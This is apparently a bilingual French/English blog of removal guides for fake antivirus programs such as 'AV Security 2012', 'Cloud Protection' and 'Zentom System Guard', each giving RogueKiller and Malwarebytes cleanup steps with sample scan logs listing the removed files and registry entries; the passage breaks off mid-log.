This rogue comes back these days with the same functionnal, same names and nearly the same GUI.

_______________________________________

Note:

Ce rogue utilise les associations de fichiers pour se relancer.
This rogue uses file associations to restart

Ce rogue est aussi connu sous les noms:
This rogue is also known as:

XP Internet Security 2012
XP Antivirus 2012
XP Security 2012
XP Home Security 2012
XP Antispyware 2012

Vista Antispyware 2012
Vista Antivirus 2012
Vista Home Security 2012
Vista Security 2012
Vista Internet Security 2012

Win 7 Antispyware 2012
Win 7 Internet Security 2012
Win 7 Antivirus 2012
Win 7 Home Security 2012
Win 7 Security 2012

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
Si le rogue empêche le lancement du programme -- If you're unable to launch the program

Si les extensions de fichiers ne sont pas activées, les afficher. Puis renommer RogueKiller.exe => RogueKiller.com -- If the file associations are not set activate them, then rename RogueKiller.exe => RogueKiller.com
Essayer de lancer à nouveau le programme -- Try again to start the program

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V5.2.5 [24/06/2011] par Tigzy
contact sur http://www.sur-la-toile.com
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 24/06/2011 08:02:46

Processus malicieux: 2
[SUSP PATH] uvhczddcim.exe -- c:\docume~1\tigzy\locals~1\applic~1\uvhczddcim.exe -> KILLED
[SUSP PATH] fcp.exe -- c:\documents and settings\tigzy\local settings\application data\fcp.exe -> KILLED

Entrees de registre: 9
[ROGUE ST] HKCU\[...]\Run : 1655373012 (C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe) -> DELETED
[HJ] HKLM\[...]\Security Center : AntiVirusDisableNotify (1) -> REPLACED (0)
[HJ] HKLM\[...]\Security Center : FirewallDisableNotify (1) -> REPLACED (0)
[HJ] HKLM\[...]\Security Center : UpdatesDisableNotify (1) -> REPLACED (0)
[FILE ASSO] HKCU\[...]Software\Classes\.exe\shell\open\command : ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "%1" %*) -> REPLACED : ("%1" %*)
[FILE ASSO] HKCU\[...]Software\Classes\exefile\shell\open\command : ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "%1" %*) -> REPLACED : ("%1" %*)
[FILE ASSO] HKLM\[...]Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command : ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe") -> REPLACED : ("C:\Program Files\mozilla firefox\firefox.exe")
[FILE ASSO] HKLM\[...]Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command : ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode) -> REPLACED : ("C:\Program Files\mozilla firefox\firefox.exe" -safe-mode)
[FILE ASSO] HKLM\[...]Software\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command : ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "C:\Program Files\Internet Explorer\iexplore.exe") -> REPLACED : ("C:\Program Files\internet explorer\IEXPLORE.EXE")

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[2].txt >>
RKreport[1].txt ; RKreport[2].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Le rogue devrait être supprimé -- The rogue should have been deleted

[Rogue] AV Security 2012

2011-11-16T22:50:00.001-08:00

Comment supprimer AV Security 2012

How to get rid of AV Security 2012

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
S'il ne peut pas se lancer, renommez le en "winlogon.exe" -- Il you are unable to lauch it, rename it as "winlogon.exe"

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V6.1.9 [16/11/2011] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 17/11/2011 07:45:13

¤¤¤ Processus malicieux: 1 ¤¤¤
[WINDOW : AV Security 2012] AV Security 2012v121.exe -- C:\WINDOWS\system32\AV Security 2012v121.exe -> KILLED [TermProc]

¤¤¤ Entrees de registre: 2 ¤¤¤
[RESIDU] HKLM\[...]\Run : lOL3rbI2dU1d8234A (C:\WINDOWS\system32\AV Security 2012v121.exe) -> DELETED
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> REPLACED (0)

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤

¤¤¤ Driver: [LOADED] ¤¤¤

¤¤¤ Infection : ¤¤¤

¤¤¤ Fichier HOSTS: ¤¤¤
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[1].txt >>
RKreport[1].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org

Version de la base de données: 8180

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

17/11/2011 07:53:27
mbam-log-2011-11-17 (07-53-27).txt

Type d'examen: Examen complet (C:\|)
Elément(s) analysé(s): 153531
Temps écoulé: 3 minute(s), 46 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 5

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
c:\documents and settings\tigzy\Bureau\rk_quarantine\av security 2012v121.exe.vir (Trojan.FakeMS1) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\av security 2012v121[1].vir (Trojan.FakeMS1) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\av security 2012v121.exe (Trojan.FakeMS1) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\application data\ldr.ini (Malware.Trace) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\av security 2012.lnk (Rogue.AVSecurity2012) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue must have been deleted

[Rogue] Privacy Protection

2011-11-11T01:29:00.001-08:00

Comment supprimer Privacy Protection

How to get rid of Privacy Protection

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
S'il ne peut pas se lancer, renommez le en "winlogon.exe" -- Il you are unable to lauch it, rename it as "winlogon.exe"

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V6.1.7 [05/11/2011] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 11/11/2011 10:22:02

¤¤¤ Processus malicieux: 1 ¤¤¤
[SUSP PATH] privacy.exe -- C:\Documents and Settings\All Users\Application Data\privacy.exe -> KILLED [TermProc]

¤¤¤ Entrees de registre: 2 ¤¤¤
[SUSP PATH] HKCU\[...]\Run : Privacy Protection (C:\Documents and Settings\All Users\Application Data\privacy.exe) -> DELETED
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> REPLACED ()

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤

¤¤¤ Driver: [LOADED] ¤¤¤

¤¤¤ Infection : ¤¤¤

¤¤¤ Fichier HOSTS: ¤¤¤
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[1].txt >>
RKreport[1].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org

Version de la base de données: 8137

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

11/11/2011 10:31:34
mbam-log-2011-11-11 (10-31-34).txt

Type d'examen: Examen complet (C:\|)
Elément(s) analysé(s): 152446
Temps écoulé: 3 minute(s), 10 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 5

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
c:\documents and settings\all users\application data\privacy.exe (Exploit.Drop.Gen) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\privacyprotection.exe (Exploit.Drop.Gen) -> Quarantined and deleted successfully..
c:\documents and settings\tigzy\Bureau\rk_quarantine\privacy.exe.vir (Exploit.Drop.Gen) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\Temp\7.tmp (Exploit.Drop.Gen) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\privacyprotection[1].vir (Exploit.Drop.Gen) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue must have been deleted

Si dans les lignes du rapport RogueKiller vous voyez quelque chose qui ressemble à ça, c'est qu'il y a un rootkit ZeroAccess avec -- If in the RogueKiller report you see something like this, there must have a ZeroAccess rootkit.

C:\WINDOWS\2277133728:1605518712.exe

Si c'est le cas, je vous conseille de suivre la démarche suivante -- If this is the case, I advise you to follow the following procedure:

Rootkit ZeroAccess

[Rogue] Security Sphere 2012

2011-10-20T23:04:00.000-07:00

Comment supprimer Security Sphere 2012

How to get rid of Security Sphere 2012

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
S'il ne peut pas se lancer, renommez le en "winlogon.exe" -- Il you are unable to lauch it, rename it as "winlogon.exe"

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V6.1.3 [14/10/2011] par Tigzy
contact sur http://www.sur-la-toile.com

mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 21/10/2011 07:43:03

Processus malicieux: 1
[SUSP PATH] eP02401NmFnE02401.exe -- c:\documents and settings\all users\application data\ep02401nmfne02401\

ep02401nmfne02401.exe -> KILLED [TermProc]

Entrees de registre: 2
[SUSP PATH] HKCU\[...]\RunOnce : eP02401NmFnE02401 (C:\Documents and Settings\All Users\Application Data\eP02401NmFnE02401\eP02401NmFnE02401.exe) -> DELETED
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> REPLACED ()

Fichiers / Dossiers particuliers:

Driver: [LOADED]

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[1].txt >>
RKreport[1].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Version de la base de données: 7991

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

21/10/2011 07:57:05
mbam-log-2011-10-21 (07-57-05).txt

Type d'examen: Examen complet (C:\|)
Elément(s) analysé(s): 156378
Temps écoulé: 3 minute(s), 37 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 4

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
c:\documents and settings\all users\application data\ep02401nmfne02401\

ep02401nmfne02401.exe (Rogue.SecuritySphere) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\securitysphere.exe (Rogue.SecuritySphere) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\ep02401nmfne02401.exe.vir (Rogue.SecuritySphere) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\securitysphere[1].vir (Rogue.SecuritySphere) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue must have been deleted

[Rogue] Cloud Protection

2011-10-15T00:00:00.000-07:00

Comment supprimer Cloud Protection

How to get rid of Cloud Protection

Ce rogue inove un peu en copiant ses fichiers dans le repertoire %system32%. Il intègre aussi souvent un rootkit TDSS -- This rogue uses quite new behaviour, by dropping its files in %sys32%. It often comes with rootkit TDSS.

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
S'il ne peut pas se lancer, renommez le en "winlogon.exe" -- Il you are unable to lauch it, rename it as "winlogon.exe"

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V6.1.3 [14/10/2011] par Tigzy
contact sur http://www.sur-la-toile.com
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 15/10/2011 08:50:02

Processus malicieux: 2
[RANDOMNAME] UQAX6jQXymZtOrI.exe -- c:\windows\system32\uqax6jqxymztori.exe -> KILLED [TermProc]
[SUSP PATH] svhostu.exe -- c:\documents and settings\tigzy\application data\svhostu.exe -> KILLED [TermProc]

Entrees de registre: 3
[RANDOMNAME] HKLM\[...]\Run : kdvUJwsY0aTNzB8234A (C:\WINDOWS\system32\UQAX6jQXymZtOrI.exe) -> DELETED
[SUSP PATH] HKLM\[...]\Run : oZ4tgOLrbKev1c0 (C:\Documents and Settings\tigzy\Application Data\svhostu.exe) -> DELETED
[BLACKLIST] crss.exe : C:\Documents and Settings\tigzy\Menu Démarrer\Programmes\Démarrage\crss.exe -> DELETED

Fichiers / Dossiers particuliers:

Driver: [LOADED]

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[1].txt >>

Faire un scan avec TDSSKiller et supprimer tous les éléments trouvés -- Do a scan with TDSSKiller and delete all found elements

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org

Version de la base de données: 7950

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

15/10/2011 08:59:32
mbam-log-2011-10-15 (08-59-32).txt

Type d'examen: Examen complet (C:\|)
Elément(s) analysé(s): 158867
Temps écoulé: 3 minute(s), 50 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 12

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
c:\documents and settings\tigzy\menu démarrer\programmes\cloud protection (Rogue.CloudProtection) -> Quarantined and deleted successfully.

Fichier(s) infecté(s):
c:\documents and settings\tigzy\application data\svhostu.exe (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\iaxtg9prboiw6q6.exe.vir (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\pledviks6ja5m4n.exe.vir (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\svhostu.exe.vir (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\uqax6jqxymztori.exe.vir (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\Temp\svhostu.exe (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\iaxtg9prboiw6q6.exe (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\pledviks6ja5m4n.exe (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\uqax6jqxymztori.exe (Backdoor.Bot) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\menu démarrer\programmes\cloud protection\cloud protection.lnk (Rogue.CloudProtection) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\cloud protection.lnk (Rogue.CloudProtection) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\application data\ldr.ini (Malware.Trace) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue must have been deleted

[Rogue] Antivirus 2011

2011-08-16T23:15:00.000-07:00

Comment supprimer Antivirus 2011

How to get rid of Antivirus 2011

Ce rogue agit comme un screenlocker et empêche l'accès au bureau. Il convient de redémarrer en mode sans échec (avec prise en charge reseau). -- This rogue acts as a screenlocker. You must reboot under safe mode (with network support).

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V5.3.1 [06/08/2011] par Tigzy
contact sur http://www.sur-la-toile.com
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode sans echec avec prise en charge reseau
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 17/08/2011 08:00:10

Processus malicieux: 0

Entrees de registre: 2
[SUSP PATH] HKCU\[...]\Run : Windows upgrade (C:\Documents and Settings\tigzy\Application Data\AVS\svchost.exe) -> DELETED
[SUSP PATH] HKLM\[...]\Run : Windows upgrade (C:\Documents and Settings\tigzy\Application Data\AVS\svchost.exe) -> DELETED

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[1].txt >>

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.1.1800
www.malwarebytes.org

Version de la base de données: 7484

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

17/08/2011 08:13:13
mbam-log-2011-08-17 (08-13-13).txt

Type d'examen: Examen complet (C:\|)
Elément(s) analysé(s): 152412
Temps écoulé: 3 minute(s), 26 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 2

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
c:\documents and settings\tigzy\application data\AVS\svchost.exe (Trojan.Agent) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\svchost.exe.vir (Trojan.Agent) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue must have been deleted

[Rogue] BlueFlare Antivirus

2011-07-23T09:37:00.000-07:00

Comment supprimer BlueFlare Antivirus

How to get rid of BlueFlare Antivirus

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
Si le rogue empêche le lancement du programme -- If you're unable to launch the program

Si les associations de fichiers ne sont pas activées: Renommer en "winlogon" ou "firefox". Sinon renommer en winlogon.exe ou firefox.exe (rajouter l'extension .exe) -- If the file associations are not set: Rename as "winlogon" or "firefox", else rename it with the .exe extension (firefox.exe or winlogon.exe)
Essayer de lancer à nouveau le programme -- Try again to start the program

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V5.2.8 [23/07/2011] par Tigzy
contact sur http://www.sur-la-toile.com
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 23/07/2011 18:30:54

Processus malicieux: 3
[SUSP PATH] BlueFlare Antivirus.exe -- c:\documents and settings\tigzy\application data\blueflare antivirus\blueflare antivirus.exe -> KILLED
[SUSP PATH] csrss.exe -- c:\documents and settings\tigzy\application data\blueflare antivirus\csrss.exe -> KILLED
[BLACKLIST] csrss.exe -- c:\documents and settings\tigzy\menu démarrer\programmes\démarrage\csrss.exe -> KILLED

Entrees de registre: 1
[BLACKLIST] csrss.exe : C:\Documents and Settings\tigzy\Menu Démarrer\Programmes\Démarrage\csrss.exe -> DELETED

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[2].txt >>
RKreport[1].txt ; RKreport[2].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Le rogue devrait être supprimé -- The rogue should have been deleted

[Rogue] Zentom System Guard

2011-07-23T08:25:00.000-07:00

Comment supprimer Zentom System Guard

How to get rid of Zentom System Guard

Ce rogue fait croire à une mise à jour Windows update -- This rogue try to cheat the user with a Windows Update popup:

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
Si le rogue empêche le lancement du programme -- If you're unable to launch the program

Si les associations de fichiers ne sont pas activées: Renommer en "winlogon" ou "firefox". Sinon renommer en winlogon.exe ou firefox.exe (rajouter l'extension .exe) -- If the file associations are not set: Rename as "winlogon" or "firefox", else rename it with the .exe extension (firefox.exe or winlogon.exe)
Essayer de lancer à nouveau le programme -- Try again to start the program

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V5.2.7 [30/06/2011] par Tigzy
contact sur http://www.sur-la-toile.com
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 23/07/2011 17:15:42

Processus malicieux: 1
[SUSP PATH] vcc70dep2r.exe -- c:\documents and settings\tigzy\application data\bab785534d470ccbe1a0ab21efefa0da\vcc70dep2r.exe -> KILLED

Entrees de registre: 2
[SUSP PATH] HKCU\[...]\Run : vcc70dep2r.exe ("C:\Documents and Settings\tigzy\Application Data\BAB785534D470CCBE1A0AB21EFEFA0DA\vcc70dep2r.exe") -> DELETED
[SUSP PATH] Zentom System Guard.lnk : C:\Documents and Settings\tigzy\Application Data\BAB785534D470CCBE1A0AB21EFEFA0DA\vcc70dep2r.exe -> DELETED

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[2].txt >>
RKreport[1].txt ; RKreport[2].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.1.1800
www.malwarebytes.org

Version de la base de données: 7250

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

23/07/2011 17:25:03
mbam-log-2011-07-23 (17-25-03).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 138095
Temps écoulé: 1 minute(s), 36 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 2
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 6

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
HKEY_CURRENT_USER\SOFTWARE\ZentomSystemGuard (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Zentom System Guard (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
c:\documents and settings\tigzy\menu démarrer\programmes\zentom system guard (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.

Fichier(s) infecté(s):
c:\documents and settings\tigzy\Bureau\zentomsystemguard.exe (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\zentomsystemguard[1].vir (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\zentom system guard.lnk (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\application data\microsoft\internet explorer\quick launch\zentom system guard.lnk (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\menu démarrer\programmes\zentom system guard\zentom system guard.lnk (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\menu démarrer\programmes\zentom system guard\uninstall.lnk (Rogue.ZentomSystemGuard) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue should have been deleted

[Rogue] Security Protection

2011-07-23T07:42:00.000-07:00

Comment supprimer Security Protection

How to get rid of Security Protection

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
Si le rogue empêche le lancement du programme -- If you're unable to launch the program

Si les associations de fichiers ne sont pas activées: Renommer en "winlogon" ou "firefox". Sinon renommer en winlogon.exe ou firefox.exe (rajouter l'extension .exe) -- If the file associations are not set: Rename as "winlogon" or "firefox", else rename it with the .exe extension (firefox.exe or winlogon.exe)
Essayer de lancer à nouveau le programme -- Try again to start the program

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V5.2.7 [30/06/2011] par Tigzy
contact sur http://www.sur-la-toile.com
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 23/07/2011 16:34:38

Processus malicieux: 1
[SUSP PATH] defender.exe -- c:\documents and settings\all users\application data\defender.exe -> KILLED

Entrees de registre: 1
[SUSP PATH] HKCU\[...]\Run : Security Protection (C:\Documents and Settings\All Users\Application Data\defender.exe) -> DELETED

Fichier HOSTS:
127.0.0.1 localhost
::1 localhost

Termine : << RKreport[4].txt >>
RKreport[1].txt ; RKreport[2].txt ; RKreport[3].txt ; RKreport[4].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.1.1800
www.malwarebytes.org

Version de la base de données: 7249

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

23/07/2011 16:41:06
mbam-log-2011-07-23 (16-41-06).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 137963
Temps écoulé: 1 minute(s), 33 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 5

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
